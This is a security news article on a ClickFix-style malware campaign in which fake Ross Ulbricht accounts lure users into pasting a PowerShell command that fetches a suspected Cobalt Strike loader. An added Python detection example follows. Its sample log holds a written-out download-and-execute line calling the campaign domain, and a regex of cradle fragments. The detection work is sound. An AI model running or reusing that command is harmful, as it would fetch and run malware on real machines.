Fake Ross Ulbricht Accounts Exploited in Latest Malware Campaign

Ross Ulbricht, known for creating the Silk Road, has long been central to discussions about technology’s role in criminal activity. Following his recent pardon by US President Donald Trump, a fresh wave of cybercrime has surfaced that uses Ulbricht’s case to spread malware.

Taking advantage of the publicity, cybercriminals on X are directing users to a Telegram channel, where they are tricked into executing PowerShell scripts that infect their machines with malware.

**Ross Ulbricht Malware Campaign**

According to the latest insights from vx-underground researchers, the attack employs a new twist on the “Click-Fix” tactic. Instead of posing as a simple error fix, it masquerades as a captcha or verification step necessary to access the channel. Here, cybercriminals pretend to be Ulbricht using fake verified accounts on X, enticing users to join bogus Telegram channels they claim are official. Users on Telegram face a fake “Safeguard” identity check, leading them to a mini app that creates a counterfeit verification prompt and automatically places a PowerShell command on their clipboard.

Users are then prompted to execute the command through the Windows Run dialog, initiating a sequence of actions. The command downloads a PowerShell script, which fetches a ZIP file from http://openline[.]cyou. This ZIP contains several files, including identity-helper.exe, suspected to be a Cobalt Strike loader—a tool often used by attackers for remote access and conducting ransomware or data theft operations. The instructions are crafted to evade detection.
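The following is an added detection example, not code from the report or from vx-underground: it scans constructed Sysmon-style process-creation records for the paste-to-Run step described above. It assumes that a command pasted into the Windows Run dialog shows up with explorer.exe as the parent process, and uses the field names ParentImage, Image and CommandLine for the records.

```python
import re

# Constructed sample process-creation records in the shape of Sysmon Event ID 1 fields.
# These are made-up log entries for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://openline.cyou/s.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
]

# Download-and-execute cradle fragments typical of ClickFix one-liners.
CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
    r"\biex\b|invoke-expression|-enc\w*\s|frombase64string)", re.IGNORECASE)
# Domain reported on the page (defanged there as openline[.]cyou).
CAMPAIGN_DOMAINS = ("openline.cyou",)

def assess(event):
    """Return the reasons an event looks like a paste-to-Run ClickFix chain, or []."""
    reasons = []
    parent = event["ParentImage"].lower()
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    # Assumption: commands pasted into the Win+R Run dialog are spawned by explorer.exe.
    launched_from_run_dialog = parent.endswith(r"\explorer.exe")
    if launched_from_run_dialog:
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if CRADLE.search(cmd):
        reasons.append("download-and-execute cradle in command line")
    if any(d in cmd.lower() for d in CAMPAIGN_DOMAINS):
        reasons.append("contacts domain reported for this campaign")
    # A bare interactive PowerShell from Explorer is normal: require a cradle or domain hit too.
    if launched_from_run_dialog and len(reasons) > 1:
        return reasons
    return []

def scan(events):
    """Index every event that assess() flags, paired with its reasons."""
    return [(i, assess(e)) for i, e in enumerate(events) if assess(e)]
```

Only the first constructed record is flagged; the scheduled backup script and the bare interactive shell are left alone.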
